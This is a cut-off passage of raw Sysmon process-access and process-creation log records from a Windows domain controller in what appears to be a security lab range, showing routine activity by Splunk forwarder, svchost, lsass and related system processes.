10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.378{D28789B6-7C76-5FA1-5100-000000008801}39123888C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.300{D28789B6-7C62-5FA1-0B00-000000008801}8682496C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.300{D28789B6-7C62-5FA1-0B00-000000008801}8682496C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C76-5FA1-5100-000000008801}3912C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C76-5FA1-5100-000000008801}3912C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C76-5FA1-5000-000000008801}38963916C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C76-5FA1-5100-000000008801}3912C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.141{D28789B6-7C76-5FA1-5100-000000008801}3912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C76-5FA1-5000-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C76-5FA1-5000-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C76-5FA1-5000-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.128{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program 